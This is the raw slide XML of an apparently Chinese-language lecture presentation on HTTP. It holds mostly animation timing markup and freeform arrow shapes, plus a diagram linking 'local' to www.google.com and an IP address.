                                        <p:cTn id="30" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5428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4278"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="33" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="54278"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="34" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="54278"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="35" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5427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4282"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="40" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="54282"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="41" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="42" presetID="54" presetClass="entr" presetSubtype="0" accel="100000" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="43" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="54283"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="44" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="54283"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w*0.05"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="45" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="54283"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="46" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="54283"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x-.2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="47" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="54283"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="48" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5428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4284"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="53" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="54284"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="54" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="55" presetID="54" presetClass="entr" presetSubtype="0" accel="100000" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="56" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="54285"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="57" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="54285"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w*0.05"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="58" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="54285"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="59" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="54285"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x-.2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="60" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="54285"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="61" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="54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ldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="54278" grpId="0" bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="54280" grpId="0" bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="54282" grpId="0" animBg="1"/>
      <p:bldP spid="54283" grpId="0" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="54284" grpId="0" animBg="1"/>
      <p:bldP spid="54285" grpId="0" bldLvl="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标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>超文本传输协议</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="552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4076700"/>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412875"/>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3860800"/>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7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3575050" y="2370138"/>
            <a:ext cx="1627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本地</a:t>
            </a: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5303" name="TextBox 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6380163" y="4940300"/>
            <a:ext cx="19002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www.google.com</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203.208.39.22</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55304" name="TextBox 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1755775" y="5106988"/>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5305" name="Freeform 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1936750" y="1790700"/>
            <a:ext cx="1933575" cy="2168525"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 29281 w 1933183"/>
              <a:gd name="T1" fmla="*/ 2180741 h 2167003"/>
              <a:gd name="T2" fmla="*/ 317902 w 1933183"/>
              <a:gd name="T3" fmla="*/ 605062 h 2167003"/>
              <a:gd name="T4" fmla="*/ 1936713 w 1933183"/>
              <a:gd name="T5" fmla="*/ 0 h 2167003"/>
              <a:gd name="T6" fmla="*/ 0 60000 65536"/>
              <a:gd name="T7" fmla="*/ 0 60000 65536"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 w 1933183"/>
              <a:gd name="T10" fmla="*/ 0 h 2167003"/>
              <a:gd name="T11" fmla="*/ 1933183 w 1933183"/>
              <a:gd name="T12" fmla="*/ 2167003 h 2167003"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T6">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T7">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T8">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T9" t="T10" r="T11" b="T12"/>
            <a:pathLst>
              <a:path w="1933183" h="2167003">
                <a:moveTo>
                  <a:pt x="29227" y="2167003"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="14613" y="1564709"/>
                  <a:pt x="0" y="962416"/>
                  <a:pt x="317326" y="601249"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="634652" y="240082"/>
                  <a:pt x="1283917" y="120041"/>
                  <a:pt x="1933183"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306" name="Freeform 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2705100" y="2530475"/>
            <a:ext cx="1390650" cy="1666875"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 1392738 w 1390389"/>
              <a:gd name="T1" fmla="*/ 0 h 1665961"/>
              <a:gd name="T2" fmla="*/ 966133 w 1390389"/>
              <a:gd name="T3" fmla="*/ 956689 h 1665961"/>
              <a:gd name="T4" fmla="*/ 0 w 1390389"/>
              <a:gd name="T5" fmla="*/ 1674207 h 1665961"/>
              <a:gd name="T6" fmla="*/ 0 60000 65536"/>
              <a:gd name="T7" fmla="*/ 0 60000 65536"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 w 1390389"/>
              <a:gd name="T10" fmla="*/ 0 h 1665961"/>
              <a:gd name="T11" fmla="*/ 1390389 w 1390389"/>
              <a:gd name="T12" fmla="*/ 1665961 h 1665961"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T6">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T7">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T8">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T9" t="T10" r="T11" b="T12"/>
            <a:pathLst>
              <a:path w="1390389" h="1665961">
                <a:moveTo>
                  <a:pt x="1390389" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="1293312" y="337159"/>
                  <a:pt x="1196236" y="674318"/>
                  <a:pt x="964504" y="951978"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="732773" y="1229638"/>
                  <a:pt x="366386" y="1447799"/>
                  <a:pt x="0" y="1665961"/>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307" name="Freeform 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2792413" y="4171950"/>
            <a:ext cx="4084637" cy="349250"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 4083485"/>
              <a:gd name="T1" fmla="*/ 337640 h 350729"/>
              <a:gd name="T2" fmla="*/ 1820894 w 4083485"/>
              <a:gd name="T3" fmla="*/ 12059 h 350729"/>
              <a:gd name="T4" fmla="*/ 4093868 w 4083485"/>
              <a:gd name="T5" fmla="*/ 265290 h 350729"/>
              <a:gd name="T6" fmla="*/ 0 60000 65536"/>
              <a:gd name="T7" fmla="*/ 0 60000 65536"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 w 4083485"/>
              <a:gd name="T10" fmla="*/ 0 h 350729"/>
              <a:gd name="T11" fmla="*/ 4083485 w 4083485"/>
              <a:gd name="T12" fmla="*/ 350729 h 350729"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T6">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T7">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T8">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T9" t="T10" r="T11" b="T12"/>
            <a:pathLst>
              <a:path w="4083485" h="350729">
                <a:moveTo>
                  <a:pt x="0" y="350729"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="567846" y="187890"/>
                  <a:pt x="1135693" y="25052"/>
                  <a:pt x="1816274" y="12526"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2496855" y="0"/>
                  <a:pt x="3290170" y="137786"/>
                  <a:pt x="4083485" y="275573"/>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308" name="Freeform 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2781300" y="4684713"/>
            <a:ext cx="4083050" cy="354012"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 4079577 w 4083485"/>
              <a:gd name="T1" fmla="*/ 0 h 352817"/>
              <a:gd name="T2" fmla="*/ 1977220 w 4083485"/>
              <a:gd name="T3" fmla="*/ 348653 h 352817"/>
              <a:gd name="T4" fmla="*/ 0 w 4083485"/>
              <a:gd name="T5" fmla="*/ 90391 h 352817"/>
              <a:gd name="T6" fmla="*/ 0 60000 65536"/>
              <a:gd name="T7" fmla="*/ 0 60000 65536"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 w 4083485"/>
              <a:gd name="T10" fmla="*/ 0 h 352817"/>
              <a:gd name="T11" fmla="*/ 4083485 w 4083485"/>
              <a:gd name="T12" fmla="*/ 352817 h 352817"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T6">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T7">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T8">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T9" t="T10" r="T11" b="T12"/>
            <a:pathLst>
              <a:path w="4083485" h="352817">
                <a:moveTo>
                  <a:pt x="4083485" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="3371589" y="161794"/>
                  <a:pt x="2659693" y="323589"/>
                  <a:pt x="1979112" y="338203"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1298531" y="352817"/>
                  <a:pt x="649265" y="220249"/>
                  <a:pt x="0" y="87682"/>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299"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="55299"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="55299"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="9" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="55299"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="10" presetID="53" presetClass="entr" presetSubtype="16" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="11" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="55301"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="55301"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="55301"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="55301"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="15" presetID="53" presetClass="entr" presetSubtype="16"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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="55300"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="55300"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="55300"/>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55303"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="55303"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="24" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="55303"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="25" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="55303"/>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5304"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="28" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="55304"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="29" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="55304"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="30" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="55304"/>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5302"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="33" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="55302"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="34" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="55302"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
